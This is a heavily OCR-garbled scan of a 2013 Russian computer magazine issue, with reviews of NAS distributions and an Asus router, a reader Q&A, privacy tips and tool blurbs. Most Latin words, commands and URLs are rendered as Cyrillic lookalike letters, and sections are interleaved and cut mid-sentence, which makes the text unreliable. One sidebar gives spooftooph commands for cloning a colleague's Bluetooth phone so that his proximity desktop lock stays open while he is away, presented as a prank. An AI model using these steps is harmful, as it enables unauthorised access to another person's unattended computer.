Подключение возможно как по ЫАЗ (ЫРЗ, 
СІРЗ, ѴѴеЬЭАѴ, РТР), так и по 5АЫ (іЗСЗІ & РС). Ре- 
ализовано управление квотами на уровне поль- 



зователей и групп, возможна интеграция с Асйѵе 
Эігесіюгу. Управление системой производится 
через удобный веб-интерфейс (Ыехеп1:а31:ог 
Мападетепі Ѵіеѵѵег) или с помощью командной 
строки. Предусмотрена интеграция с внешними 
приложениями посредством АРІ, возможности 
расширяются при помощи модулей. 

Перед установкой следует свериться со спи- 
ском поддерживаемого оборудования ( ЫГ 
ІѴ/15580РШ . ЫехепіаЗіог делится на две вер- 
сии: Епіегргізе и Соттипііу ЕбШоп. Последняя 
бесплатная, построена на ІІІиплоз/ОеЫап и име- 
ет ограничение максимального размера храни- 
лища в 18 Тб, также отсутствует ряд модулей 
(например, для НА-кластера). Кроме установоч- 
ного, доступны образы для быстрого разверты- 
вания в ѴМѵѵаге и СіІтіхХеп. 

Сам процесс установки довольно прост, все 
необходимые настройки производятся при по- 
мощи мастера. Интерфейс не локализован, 
но сложным его назвать нельзя. 








ЗУ Ы/ АС К 
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ОрепМесІіаѴаііІІ 0.4.24 





Основная фишка ОрепМесІіаѴаиІІ — простая установка дополнений 



ШРО 

Релиз РгееМАЗ 8.3.0, 
построенный на базе 
РгееВЗО 8.3, стал самой 
популярной версией 
дистрибутива. 

Количество загрузок 
РгееМАЗ превысило 
500 тысяч. 



ІЙ ОршМвсЯо Ѵоуіі 



Сейчас ведется раз- 
работка РгееМАЗ версии 
9.1, пока находится 
в статусе бета. 

Автор ОрепМесІіаѴаиІІ - 
ФолькерТайле (Ѵоікег 
ТРіеіІе), один из основ- 
ных разработчиков 
РгееМАЗ. 



ОрепМесІіаѴаиІІ — самодостаточное решение, появившееся в результате пере- 
носа идей РгееЫАЗ в РеЬіап 



Сайт: ооептесііаѵаиіі.ога 

Платформа: ОеЬіап 
Системные требования: СРІІ 
І486/атс164, РАМ 1+ Гб, РЮР 2+ Гб 
Архитектура: х86, х64 
Русификация интерфейса: да 
Лицензия: ОІМІІ СРІ_ 

Проект развивается в рамках РгееІЧАЗ и предлага- 
ет его реализацию, основанную на пакетной базе 
ОеЬіап (ядро 2.6.32). Считать ОрепМесІіаѴаиІІ ко- 
пией нельзя, поскольку это вполне самодостаточ- 
ное решение со своими особенностями. Так, если 
РгееІМАЗ ориентирован на максимальное исполь- 
зование возможностей 2Р5, то ОрепМесІіаѴаиІІ: 
нацелен на большую поддержку встраиваемых 
устройств и простую подсистему установки до- 
полнений и обновлений. Например, для установ- 
ки плагинов и обновлений используется штатный 
пакетный менеджер, поэтому вместо смены всей 
«прошивки» просто ставится новая версия пакета, 
админ выбирает ее в предложенном списке в ОШ, 
даже не вникая в особенности работы АРТ. 

Система может быть запущена на любом 
ОеЫап -совместимом оборудовании. В качестве 
файловой системы используются ехіЗ/ехі4/ХРЗ/ 
ЗРЗ и ЫТРЗ/РАТ32 (чтение/запись), поддержива- 
ется программный РАЮ (0, 1 , 5, 6, ЗВОй, 5+0, 5+1 , 
0+1, 1+0 и другие при помощи плсіасіт). Для дос- 
тупа к данным настраиваются ЗМВ/СІР8, РТР/ 
РТР5, ТРТР, І\ІР5ѵЗ/ѵ4, 53Н и ВЗУІЧС. Некоторые 
возможности реализованы при помощи плагинов: 
І_ѴМ, І5С8І іагдеі, поддержка ЮАР, доступ АРР, 
клиент ВііТоггепі, сервер йААР, поддержка ІІРЗ 
и антивирус. Возможна организация совместного 
доступа к ресурсам и разделения привилегий (в 
том числе АСІ_) на основе групп и пользователя, 
настройка квот. Для мониторинга используется 
ЗІММР (ѵ1/2с/3), 8.М.А.Р.Т., отслеживается со- 
стояние ІІРЗ. В случае проблем администратор 
получает уведомление по еплаіі. Для хранения на- 
строек создается один смешанный раздел, соче- 
тающий данные и системные файлы. 

Для установки доступен образ для х86- и х64- 
систем, образы для ѴМѵѵаге и ѴігіиаІВох, репози- 
торий для ОеЫап. Также можно скачать исходники 



Сайт: Ііте-іесНпоІоаѵ.сот/ипгаісІ-зегѵег 

Платформа: ЗІаскѵѵаге 
Системные требования: СРІІ х32, 

РАМ 512 Мб, ИОО 1+Гб 
Архитектура: х86, х64 
Русификация интерфейса: нет 
Лицензия: СІМІІ СРІ_ / коммерческая 

Дистрибутив, базирующийся на фирменной тех- 
нологии, разработанной І_іпле іесНпоІоду ЮС. 
От стандартных РАЮ ее отличает то, что в единый 
массив можно объединять диски 5АТА и РАТА, ди- 
ски разных объемов и скоростей. Для этого при- 
меняется отдельный диск для контрольной суммы 
(четности), данные между дисками не чередуют- 
ся. Предусмотрена возможность динамического 
добавления дисков в массив. 

Предлагается три версии: Вазіс (бесплатная), 
РІиз и Рго. Лицензия привязывается к СІІЮ диска, 
на которую установлена система. В Вазіс исполь- 
зуется обычный РАЮ и установлено ограничение 



и собрать самому, то есть при желании дистрибу- 
тив легко затачивается под конкретные условия. 

Управляющий веб-интерфейс ОрепМесІіаѴаиІІ: 
написан на РНР с использованием фреймворка 
ЕхУЗ, поддержка Аіах позволяет получать данные 
без перезагрузки страниц. Несмотря на исполь- 
зование других инструментов в создании интер- 
фейса, внешне он очень похож на РгееІЧАЗ, хотя 
несколько проще в использовании (сказываются 
особенности ФС и системы обновлений). 



в три диска (РІиз — 7, Рго — 25). Старшие версии 
поддерживают возможность разграничения до- 
ступа и интеграцию с Асііѵе Оігесіогу. 

Основой ипРАЮ Зегѵег является дистрибутив 
ЗІаскѵѵаге. Управление производится при по- 
мощи веб-интерфейса или стандартных команд 
ІІІЧІХ. Дистрибутив нетребователен к мощности 
СРІІ и ориентирован прежде всего на встроен- 
ные системы, может устанавливаться и работать 
с ІІЗВ-носителя. Система плагинов позволяет 
легко расширять штатные возможности. При зна- 
нии основ І_іпих все нужное можно добавить само- 
стоятельно. Поддерживаются все присущие ЫАЗ 
и ЗАМ протоколы. 

Перед установкой рекомендуется свериться 
со списком Нагсіѵѵаге СоплраііЬіІііу. Сам процесс 
развертывания можно назвать нестандартным, 
но он хорошо описан в документации. По умолча- 
нию диски форматируются в РеізегРЗ ѵЗ.6 (реко- 
мендуемой), поддерживаются и другие ФС, в том 
числе ГЧТРЗ. 



Хотя программа установки и текстовая, ни- 
каких особых сложностей она вызвать не долж- 
на. В процессе предстоит выбрать часовой пояс 
и установить пароль гооі. По умолчанию систем- 
ный диск форматируется в ехі4, и повлиять на это 
никак нельзя. Все остальные системные настрой- 
ки производятся также через веб — сеть, бранд- 
мауэр, обновления, плагины и так далее. Пароль/ 
логин для входа в интерфейс управления — 
абтіп/орептесііаѵаиіі. 



ЗАКЛЮЧЕНИЕ 

Выбор готовых решений, как видишь, 
очень большой, посоветовать что-то 
одно довольно сложно. Все зависит 
от конкретных условий использования 
и личных предпочтений касательно 
ОС и основной файловой системы. Сто- 
ронники І_іпих наверняка остановятся 
на ОрепМесІіаѴаиІІ, а ВЗСшники будут 
мучительно выбирать между РгееІЧАЗ 
и ЫА34Ргее. Если ты хочешь полностью 
оценить возможности 2РЗ, попробуй 
начать с ІЧехепіаЗіог. 



II п КАЮ Зегѵег 
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НОВЫЙ 

РОУТЕР ОТ АЗЫЗ 
С ПОДДЕРЖКОЙ 
802. НАС 





ХАРАКТЕРИСТИКИ 

Поддержка стандартов: 

802.11 а/Ь/д/п/ас 

Антенна: 2 съемные 

Рабочие частоты: 2,4-2,4835/ 

5, 1-5,8 ГГц 

Шифрование: 64-ЫП/ѴЕР, 128-Ы1 
ѴѴЕР, ѴѴРА2-Р5К, ѴѴРА-Р5К, ѴѴРА- 
Епіегргізе, ѴѴРА2-Еп1егргі5е 
Сетевые возможности: ІІРпР, 

ОИМА, 0ІМ5 Ргоху, ІЧТР СІіегй, 00М5, 
Рогі Тгідег, Ѵігіиаі Зегѵег, 0М2 
ѴРЫ-сервер: РРТР 
Гостевые сети: 3 х 2,4 ГГц, 3 х 5 ГГц 
Порты: 1 х ПѵМ5 Іог 10/100/1000 
ВазеТ ІогІЛ/АІМ, 4 х П^45 Іог 
10/100/1000 ВазеТІоПАМ, 1 хУ5В 
2.0, 1 х 115В 3.0 
Габариты: 147 х 205 х 66 мм 
Вес: 406 г 



К огда друзья просят меня подсказать «роутер 
подешевле», я стараюсь объяснить, почему 
экономить на таком устройстве не стоит. Во- 
первых, вряд ли кто-то будет обновлять марш- 
рутизатор каждый год. Стандарты ѴѴі-Рі меня- 
ются не так часто, а потому твоя машинка будет оставаться 
актуальной еще долгое время. Во-вторых, переход на хо- 
роший роутер — это такой же апгрейд для твоего компью- 
тера, каким когда-то был переход с НЮО на ЗЗР. 

Наверняка у тебя дома накопилось множество 
устройств, объединенных в сеть: ноутбуки, планшеты, 
смартфоны, І\ІА8, игровые и медиаприставки. Покупка 
мощного роутера — это апгрейд для всех твоих гадже- 
тов. И дело не только в скорости, ведь у качественных 
продуктов выше и надежность, и функциональность. Да 
и фирменные прошивки сейчас дошли до такого уровня, 
что смысла в ковырянии ОО-ѴѴРТ/ОрепѴѴРТ почти не оста- 
лось. И тут на сцену выходят модели от Азиз, традиционно 
выигрывающие по всем этим пунктам. 

РТ-АС561І — совсем свежий роутер (в продажу по- 
ступит в августе), который, по идее, позиционируется 
как бюджетный, но в жизни все не так просто. Если срав- 
нивать его с текущим флагманом (РТ-АС661І, см. февраль- 
ский ][), то тут появился двухъядерный процессор и под- 
держка ІІЗВ 3. Объем ОЗУ остался прежним — 256 Мб. 
Единственное, в чем модель уступает, — в ней две антен- 
ны, а не три, и потому пропускная способность составляет 
867 Мбит/с, а не 1300. Очевидно, что у Азиз припасен еще 



один флагман. Ну а пока это одно из самых интересных 
устройств для владельцев сложных домашних сетей. 

В родной прошивке от Азиз есть куча функций, для ко- 
торых пригодятся и ІІЗВ 3, и двухъядерный процессор. На- 
пример, в веб-интерфейсе легко создается персональное 
облако АіСІоисІ — тебе нужно лишь подключить к быстро- 
му ІІЗВ-порту внешний жесткий диск, который будет рас- 
шариваться как внутри сети, так и вне ее. Для мобильных 
устройств, кстати, доступны соответствующие клиенты. 
Из коробки доступна и Іюггепіжачалка, и ѴРЫ-сервер, 
и поддержка гостевых ѴѴі-Рі -сетей. В общем, есть чем за- 
грузить мощную начинку. 

Из других возможностей стоит отметить инструменты 
для мониторинга сетей. Например, через веб-интерфейс 
легко получить статистику по всему трафику, генерируе- 
мому устройствами в доме. На основе этой информации 
можно понять, например, выполняет ли провайдер свои 
обещания по тарифу. Также есть удобная функция карты 
сети, позволяющая быстро определить, какой ІР был при- 
своен тому или иному устройству. 

ВЫВОДЫ 

Брать роутер без поддержки ас сейчас бессмысленно. 
Даже если у тебя пока нет устройств, которые поддержи- 
вают этот стандарт, они наверняка появятся в следующем 
году. И ВТ-АС561І — отличный вариант для гаджетоманов 
с кучей устройств в доме. Мощный роутер улучшит работу 
всех твоих игрушек. НЕ 



1^0 



ХАКЕР 08 /175/ 2013 




ЕСТЬ ВОПРОСЫ — ПРИСЫЛАЙ 

НАРАС@РЕАЬ.ХАКЕРРЫ 




Роман Гоций 

доі5і]готап@дтаіІ.сот 



□ Потерял кабель от андроидофона. Все 
бы ничего, вот только шить нужно ча- 
сто — лень каждый раз заливать файлы 
по ѴѴі-Рі на девайс, перезагружаться 
в Ресоѵегу и так далее. Есть ли способ авто- 
матизировать? 

□ Не ты один потерял кабель. Пользователь 
с ником РгІ91 с ХЭА Эеѵеіорегз разработал 
приложение ПеплоіеРІазІі ( ЫЬІѵ/гетоіеГІазН ). ко- 
торое состоит из двух частей — ^ѵа-приложения 
для десктопа и АРК для девайса. После установки 
обеих частей получаешь возможность заливать 
прошивки и обновления через ѴѴі-Рі так же удоб- 
но, как с использованием кабеля. Учти, что про- 
ект находится на стадии активного развития, так 
что работа приложения может быть нестабиль- 
ной. 

Работаю под КиЬигНи, и часто нужно 
держать огромное количество откры- 
тых вкладок в СГіготіит. Так вот, когда пере- 
ключаюсь на старые вкладки, бывает, ноут 
подвисает. Он у меня бюджетный, слабень- 
кий. Можно чем-то помочь или покупать но- 
вый? 

□ Во-первых, КиЬипШ с его кедами не самый 
легковесный из Ыпих-дистрибутивов. В ка- 
честве альтернативы можешь попробовать 
ЬиЬипШ (производный от ІІЬііпШ дистрибутив 
с малым потреблением ресурсов, в качестве ме- 
неджера рабочего стола задействован І_ХЭЕ). 
Но прежде всего обязательно попробуй модуль 
гРапл. При его использовании в оперативке соз- 
дается зѵѵар, данные в котором сжимаются 
на лету, что в результате почти равноценно уве- 
личению объема оперативки. Ручная настройка 
и принцип действия детально описаны в статье 



ІіаЬгаІіаЬг.ги/роз1:/172137 . Кроме того, в репози- 
ториях ІІЬипШ 12.04 и новее есть приложение, 
производящее автоматическую оптимальную на- 
стройку гРапл: ггат-сопТід (его нужно просто 
установить). Кстати, ЫЬипШ с версии 13.10 вклю- 
чает в себя гРапл по умолчанию. 

Время от времени необходимо загру- 
жаться в разные дистрибутивы на своем 
компе. Поскольку флеха не всегда под рукой, 
подскажи, как загружаться прямо из 130- 
файла? 



□ Такой возможностью обладает загрузчик 
СРІІВ 2, он умеет монтировать 130- 
образы. Существует два пути решения задачи: 
ручное добавление соответствующей записи 
в конфиг-файл СРІІВ 2 или использование сто- 
роннего ПО. Подробнее про первый путь мо- 
жешь почитать, например, здесь: ІлаЬгаІлаЬг.ги/ 
розі/1 18472 . Во втором случае можно восполь- 
зоваться небезызвестной утилитой ІІІМеІЬооІіп. 
Все довольно просто: выбери образ диска, в ка- 
честве типа устройства укажи «Жесткий диск» 
и щелкай ОК. После перезагрузки в СВІІВ уви- 
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Ксу 5с*л»г« РеЬс*1 МКгемІІ Л«ів«л» Сфіога* 

Ѵакх Ро*аЛ»ЛолА<ъдп 



Ехріапатіоп 



і« Йч даЬик аспог Ы іЬ« рал «г Ьипоп ап Йч і»*п тсгѵи. 

к уои вгѵаЫв ІЬ« м»«»9 Он ЯаИ м*лд иЛ. віа ро*а» ЬйИоо Ю Он <Ьо*ап асЬол «Ю поі М 
»Ь« имг гіылд* іЬ» мъол. 

к уои м< ІІн ЬиНоп )о пМі** Лаар от НіЬ*пи(а «к! ІМ •Лліс а поі ѵирроПусі оп а сотри)?» 
т«п Пм Гэиног *»« Гаіі баск (о УкЛ Ооап 

к > ои <*иЫа ог Йо по) согйідит» »«•. мВтд Иі* &ип м»пи рола? Ьипоп яіІІ імійіо ѴМ 0о*п 
Оу <*Иаик іь« им* сап сКаода Йп» мНяуд Іо апойнг асЬоп. 

ваа ОаіаікЛ ѵаіиас •»« 

«пит: К7 Ро*агви«оі>А<ЪооО»ор8о*« ѵвкнМвтв: Ро*а«*иПопі<|іо*і 
п*т: Йасітаі: 2 *» ІИ и» Оо.ѵп 



Вот так выглядит СРЗеагсІі 





ЗАЩИЩАЕМ ЛИЧНУЮ ИНФОРМАЦИЮ ОТ РКІЗМ 



В свете последних новостей о сливе 
персональной информации пользова- 
телей такими гигантами, как Соодіе, 
ГасеЬоок и Арріе, никто не может быть 
уверен в неприкосновенности своих 
данных на этих, да и на других сервисах. 
Конечно, есть огромное количество 
альтернативных способов обмениваться 
информацией, сохраняя при этом кон- 
фиденциальность данных. Но что, если 
не хочется или не представляется воз- 
можным отказаться, например, оттого 
же СтаіІ или Сіаік, но при этом нужно 
защитить важные данные от слива? Да- 
вай посмотрим, что можно сделать. 



Скрываем информацию о поисках 

Конечно, собранная Соодіе информация 
о твоих поисковых запросах и посеща- 
емых страницах приносит некоторые удобства, 
а также позволяет поисковику показывать тебе 
более релевантную рекламу. Но если ты все же 
не в восторге от мысли, что история твоего поис- 
ка будет слита спецслужбам, тебе стоит исполь- 
зовать вместо гугла Зіагіраде ( ШрзѴ/зіагіраае. 
сот ). Ищет в конечном счете все равно Соодіе, 
но теперь он не знает о тебе практически ничего. 



Шифруем Соодіе-чаты 

Следующим шагом зашифруем лич- 
ную переписку в Сіаік или же Соодіе 
НапсІзоиЕ Для этого воспользуемся простеньким 
^ѵаЗсгірІ-расширением (думаю, будет легче 
уговорить знакомых установить его, нежели убе- 
дить перейти на другой мессенджер). На воору- 
жение можно взять, например, вот эту наработку: 
аіШиЬ.сот/пісоІаз-ІУаАЕЗ . Это расширение 
шифрует сообщения к определенным пользова- 
телям с помощью АЕ8. На данный момент требу- 
ет указания ключа в конфигурационном файле, 
но в планах реализация протокола обмена ключа- 
ми. Установка очень проста и детально описана 
в геабпле проекта. 
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дишь пункт ІІМеІЬооІіп. Кстати, при последую- 
щем запуске ІІІЧеШойп выведет сообщение: 
«ІІІЧеШооІіп уже установлен. Удалить текущую 
версию?» Так вот, здесь имеется в виду удаление 
записи «ІІЫеІЬооІіп» из СВІІВ, а не удаление са- 
мого приложения. 



□ Нужно реализовать 5М5-рассылку уве- 
домлений с веб-сервера. Хочется деше- 
во и сердито. Что порекомендуешь? 

□ По ссылке ЬіІ.ІѵАл/еЬЗтз находится под- 
робный мануал, как настроить нужный тебе 
функционал, используя старый телефон или 118В- 
модем, подключенный к компьютеру по СОМ- или 
ІІЗВ-порту. Но наиболее простым решением бу- 
дет заюзать в качестве ЗМЗ-шлюза любой бюд- 
жетный АпбгоісІ-фон, установив на него предвари- 
тельно специальное приложение, например 
ЕпѵауаЗМЗ Ьіі.Іѵ/ЕпѵаѵаЗМЗ . Инструкции по на- 
стройке последнего и описание АРІ для взаимо- 
действия с сервером описаны на офсайте зпгіз. 
епѵаѵа.ога . 



□ Активно использую Тог, но наслышан 
об уязвимостях в выходных узлах сети. 
Можно ли как-то обезопасить себя от этого? 
Можно ли привлечь дополнительные сред- 
ства шифрования? 

□ Конечно, можно, но толку от этого не будет 
никакого. Смотри, помимо злонамеренных 
исходящих узлов Тог-сети, злонамеренными мо- 
гут быть также десятки промежуточных узлов вне 
сети, через которые твой трафик идет до пункта 
назначения. Ты можешь даже пробросить ѴРЫ че- 
рез Тог, но если сервер не поддерживает защи- 
щенное соединение, то что бы ты ни предприни- 
мал — последняя миля твоего трафика к пункту 
назначения все равно будет уязвимой. Так 
что единственное разумное решение — устано- 
вить НТТР5 ЕѵегуѵѵНеге Ьі1:.Іѵ/а2ѵі4е и быть осто- 
рожным на тех ресурсах, где НТТР8 не поддержи- 
вается. 



□ После запуска ѴѴіпсІоѵѵз 8 проходит 
какое-то время до того, как система нач- 
нет запускать приложения из автозагрузки. 
Читал, что это сделано, чтобы ускорить за- 
грузку на планшетных ПК, но у меня мощный 
десктоп, и я хочу загружать приложения сра- 
зу. Можно пофиксить? 

□ Можно, но не полностью, то есть неболь- 
шая пауза все равно останется, и с этим 
ничего нельзя поделать. Для минимизации этой 
паузы заходим в редактор реестра и в ветке (соз- 
дать, если не существует) 



Полезный хинт 



АТАКА КЛОНА 




Коллега выделывается какой-то программулиной, которая лочит его рабочий 
стол, как только он отдаляется с телефоном на 5-10 метров от рабочего места 
(видимо, задействован ВІиеіооіГі). Как бы над ним подшутить? 



Хорошая новость: все приложения из тех, что я видел, которые предоставляют подоб- 
ный функционал, работают по очень простому принципу. Блокировка десктопа акти- 
вируется, если в зоне видимости компьютера нет устройства с определенным МАС- 
адресом. То есть никакой авторизации, криптографии, паролей и ключей, что позволяет очень 
легко эту «защиту» обойти. Воспользуемся для этого, например, утилитой ЗрооГГоорН ( ЬіТІѵ/ 
ЗрооіТоорН У Можно скомпилировать ее под любой дистрибутив, а можно просто запустить 
любимый ВаскТгаск, в котором она уже установлена. Каков сценарий? Мы создадим «клон» 
ВІиеІооІІі -устройства твоего коллеги, включая его МАС-адрес (работает почти аналогично АВР 
ЗрооТіпд). И когда он уйдет, его компьютер все равно будет думать, что видит его телефон, 
и не залочит скрин. Для того чтобы сделать это, вбей в терминал: 



Іісісопіп^ ІісіѲ ир 

/репІіезІі/ЫиеІіооІіІі/зроо-РііоорІі/зроо-РііоорІі -і ИсіѲ -5 



где ключ '-з' означает режим клонирования существующего устройства. Сразу после нажатия 
на <Еп1:ег> ты увидишь список найденных ВІиеІюоІД-устройств (смотри скриншот), нажимай «з» 
и вбивай нужную циферку. Все, почти готово. Осталось включить (если еще не включена) види- 
мость твоего ВІиеѣооѣИ’а: 



Іісісопіі^ ІісіѲ ир 

Іісісоп1і§ ІісіѲ ізсап 

А вот что делать после того, как коллега ушел с рабочего места, — тут уже я полагаюсь только на 
твою фантазию :). 
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'5' таке зеіесііоп, ' р * ргеѵіоиз раде, 'п 


' пехі раде, ' д' диііе: | 





Выбор устройства 
для клонирования 



Шифруем переписку по етаіі 

Существует множество способов за- 
шифровать текст етаіі-сообщения — 
от простой упаковки текста в запароленный 
архив до использования РСР-утилит. Но есть 
решение, которое позволяет шифровать твои со- 
общения, не покидая веб-интерфейса почтовика. 
Браузерное расширение (есть как для СНгопле, 
так и для РігеТох) Маііѵеіоре ( таііѵеіоое.сот ) 
поддерживает веб-почтовики от Соодіе, Ѵаііоо, 
МісгозоТІ:, а также немецкий СМХ.пеГ Работает 
расширение по принципам ОрепРСР. Установка 
и конфигурация расширения предельно просты, 
как и его использование. 



Облачные хранилища 

Если тебе не дает уснуть мысль о том, 
что твоя информация лежит на серверах 
облачных хранилищ в открытом виде, зашифруй 
ее перед загрузкой в облако. Сделать это можно 
тысячью способов, самый удобный из которых — 
использовать приложение Воцхсгуріог ( ѵѵѵѵѵѵ. 
Ьохсгѵоіог.сот ) (поддерживает ОгорЬох и Соодіе 
Огіѵе). Главное его преимущество — наличие 
ЮЗ- и АпбгоісІ-версий приложения. Как вариант, 
можно сменить облачное хранилище на такое, 
которое поддерживает шифрование на стороне 
клиента, например ЗрісІегОак или ѴѴиаІа. 



Защищаемся от трекинга 

Сейчас трудно найти страницу в интер- 
нете, которая бы не взаимодействовала 
каким-либо образом с интернет-гигантами (раз- 
личные виджеты и кнопки от соцсетей, реклама 
от Соодіе, Соодіе Апаіуіісз и прочее). Соответ- 
ственно, последние знают почти о каждом твоем 
шаге. Для того чтобы свести информацию о посе- 
щениях сайтов к минимуму, воспользуйся рас- 
ширением ОоІМоШаскМе ( ЬіГІѵ/боМоШ'аскМе ). 
Расширение защитит от более чем 600 техноло- 
гий трекинга, кроме того, как бонус ты получишь 
ускорение загрузки страниц. 
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гРат в действии 



НКЕУ_СиККЕМТ_Ц$ЕК\$о-Рі=іл/аге\Місго 50 -р^\<м 

1лІіпсІоы5\Сипгеп1:Ѵеп5Іоп\Ехр1огеп\5епіа1І2е 

создаем новый ОѴѴО В й- параметр Зіагіир- 
ОеІауІпМЗес со значением, равным нулю. 
При следующем запуске системы заметишь 
уменьшение задержки. 



□ 



□ 



Пишу простенький скрипт на РуШоп. Ис- 
пользую зиЬргосезз.саІІ для запуска 
и получения кода завершения системных ути- 
лит. Как подавить вывод запускаемых ко- 
манд? Пробовал так: м ге5=5иЬргосе55.са11 

(["ріп§", "хакер. ги"], 5І:сІегг=Мопе, 5І:сІои1:= 
Мопе)", эффект нулевой. 

□ Все правильно. ІЧопе здесь означает отсут- 
ствие какого-либо перенаправления пото- 
ков вообще. Для того чтобы перенаправить вы- 
вод команды «в никуда», вместо ІМопе тебе нужно 
указать файловый объект /беѵ/пиІІ для никсов 
или его виндовый аналог пиі. 

ітрогі: об 

•Ргот зиЬргосезз ітрогі: саіі 
сіеѵп иіі = ореп(о5.сІеѵпи11 л 'ы') 
гѳ5 = са11( ["ріп§" . "хакер. пи"] 
5І:сІепп=сІеѵпи11 < 5І:сІои1:=сІеѵпи11) 
дгіпі(ге5) 



Начинаю вникать в тайны групповых по- 
литик ѴѴіпсІоѵѵз. Часто нужно искать на- 
стройки по названию, но использовать 
для этого встроенный фильтр не очень удоб- 
но. Есть ли другое решение? 

□ Как вариант, можешь скачать предоставля- 
емый МісгозоН: ЕхсеІ-файл Ьіі.іѵ/ар хіз 
со списком всех настроек и искать по нему, 
что немного удобнее. Кроме того, можешь вос- 
пользоваться облачным приложением СРЗеагсІі 
ЬіІ.Іѵ/зеагсІіСР . в котором реализован более 
удобный поиск по ключевым словам (смотри 
скриншот). Кстати, на базе последнего разрабо- 
тано также ѴѴіпсІоѵѵзРІіопе-приложение СРЗеагсІі 
ЫІ.Іѵ/СРЗеагсНѴѴР . 



□ 



В одном из прошлых РАО было описано, 
как выполнять РоѵѵегЗИеІІ-команды 
из С#. А реально ли выполнять код С#-файлов 
из РоѵѵегЗИеІІ? 

□ Такой сценарий весьма необычен, но сде- 
лать можно. А все благодаря заядлым 
РоѵѵегЗНеІІ’щикам, которые готовы накодить 
все, только бы не покидать свою консоль. 
Для выполнения Сопрограмм из РЗ-консоли 
воспользуйся скриптом от Инго Карштайна (Іпдо 
Кагзіеіп) под названием С#8сгір1 ЫІ.Іѵ/ 
ЗІіагоЗспрІ : 



ПОЛЕЗНА ЛИ СОЛЬ? 

В посвященной криптографической соли статье Википедии есть такое 
предложение: «Соль не спасет от подбора, например, администраторского 
пароля...». Действительно ли это так? 



и 



. ХсББгірІ: . рзі "рго^гашт. сб" "рагаті" <-■ 
"рагат2" 

Каков принцип работы? Сначала С#-приложение 
компилируется в оперативную память, после чего 
запускается таіп-метод с использованием воз- 
можностей .ЫЕТ-рефлексии. Конечно, при таком 
подходе есть некоторые ограничения, как, напри- 
мер, отсутствие поддержки ресурсов и прямого 
общения приложения с консолью, но все же это 
вполне рабочее решение. 



□ 



Я храню некоторую статистическую ин- 
формацию в ЗЗОЫ-файлах. Можно каким- 
либо образом запускать ЗСІІ-- запросы поверх 
этих данных без физической загрузки их в БД? 

□ Если тебе нужен именно 50І_, то попробуй 
воспользоваться возможностями Розідге- 
50І_, а именно наличием поддержки Рогеідп Оаіа 
ѴѴгаррег (обертки для внешних данных). Соответ- 
ствующее расширение РозІдгеЗОІ. для ЗЗОЫ- 
файлов лежит под лицензией СЫІІ СРІ_ ѵЗ.О 
в СіІНиЬ’е компании СіІизРаіа аіШиЬ.сот/сіІизсІаІа/ 
ізоп Тсіѵѵ . Если же разворачивать РозІдгеЗОІ. не хо- 
чется, а тебя устроит и просто ЗОЬподобный язык 
запросов, то в таком случае выбор у тебя весьма 
богат. Множество примеров проектов, которые мо- 
гут подойти, ты найдешь в этом обсуждении 
на ЗІаскОѵегТІоѵѵ: Ыі.Іѵ/ізопОиегѵ . 



□ 



Как проще всего в линуксе заджойнить 
несколько иРС-файлов в один РОР? 

В этом тебе поможет консольная утилита 
сопѵегі из пакета ІтадеМадіск: 



$ сопѵегі: *.ір^ оігЕрігЕ.рсІ-Р 



Альтернативное решение: можешь попробовать 
воспользоваться аналогичной утилитой из пакета 
СгарІіісзМадіск: 




Главная цель «соли» заключается 
в предотвращении атаки на всю 
таблицу захешированных паролей 
сразу с использованием радужных 
таблиц ( ЬіІ.Іѵ/ІЗЗхІІіСП . Что мы 
имеем в случае одного пароля? 
Во-первых, взломщику, очевидно, 
не нужно строить никаких таблиц, 
поэтому, учитывая, что «соль» ему 
известна, он может просто запу- 
стить перебор паролей, прибавляя 
к каждому тестируемому паролю 
«соль». 




Но если пароль админа состав- 
лен по всем правилам хорошего 
пароля, то на полный перебор 
может потребоваться очень много 
времени. Вот именно здесь и 
появляется преимущество «по- 
соленного» хеша над обычным: 
во-первых, существуют огромные 
базы данных хешей, а во-вторых, 
для обычных хешей уже сгенери- 
рованы огромные террабайтные 
радужные таблицы ( ЫІ.Іѵ/гпЬѵѵТЫз ). 
с помощью которых можно быстро 
восстановить пароль. 



$ сопѵегі: *.ір^ ОігЕрігЕ.рсІ-Р 

□ Как перемонтировать без перезагрузки 
гооНз, если она была примонтирована 
в режиме только для чтения? 

□ Перемонтирование корневой файловой 
системы в таком случае завершается 
ошибкой, поскольку команда тоипі пытается об- 
новить файл /е1с/т1аЬ, который находится в этой 
же, доступной только для чтения файловой си- 
стеме, что невозможно. Специально для реше- 
ния этой проблемы существует опция -п, которая 
запрещает запись в этот файл: 

тоипі: -по гетоиггЕ.нл/ / 





СЮІШСОГіѴЕВТ ( сіоисісопѵеіі.ога ) 

— > СІоисІСопѵегІ; — утилита для конвертации файлов между 
132 форматами. Достаточно загрузить файл (напрямую или 
через ОгорЬох / Соодіе Ргіѵе), выбрать целевой формат 
и способ, каким ты хочешь его получить, — по почте или же 
обратно в облачное хранилище. При этом электронные книги 
можно конвертировать под конкретный тип устройства (іРасІ, 
АпсІгоісІ-планшет, КіпсІІе и другие популярные читалки), аудио/ 
видеофайлы можно обрезать, а картинки сжимать. Очевидный 
юзкейс — мобильные устройства, на которых внезапно может 
понадобиться посмотреть присланный файл в экзотичном 
формате. 



Инструмент для 
онлайн-конвертации 
файлов с поддержкой 
кучи форматов 



ОІ 




І94МШ* 

2. »(«4 оиіры (етпиі 



ТЕКМ50Р5ЕКѴІСЕ; ОЮЫ’ТВЕАО Цозбгощ) 

— > То5;ОВ — проект, изучающий пользовательские согла- 
шения различных веб-сервисов. В результате анализа прав 
пользователя и обязательств сервис-провайдера в каждом 
случае получилась шкала оценок от радужного А (например, 
поисковый сервис ОискйискСо) до опрессивного Е. Самый 
низкий на момент написания статьи рейтинг (О) присвоен 
ѴоиТиЬе. Практическая часть ТоЗ;0П — это специальный 
плагин для браузера. При посещении сервиса можно нажать 
на специальную кнопку и получить выдержку из его ТОЗ, 
подготовленную участниками проекта. Увы, популярных 
в Рунете сервисов, вроде Яндекса или ВКонтакте, здесь 
нет. Тем не менее это интересный инструмент для тех, кому 
хочется знать свои права в интернете. 




Выдержки из пользо- 
вательских соглаше- 
ний, подготовленные 
живыми людьми 
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Бредовый, но ориги- 
нальный и безумно затя- 
гивающий браузерный 
таймкиллер 
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САЫОѴВОХ! ( .апіѵѵеѵ.пеі ) 

— > Вряд ли ты сможешь что-то понять сразу после запуска 
СВ. Какие-то конфеты, которые можно съесть или бросить 
на пол. Подожди, пока накопится 150 конфет, — тогда игра 
внезапно предложит... купить меч. И тут все завертится. 
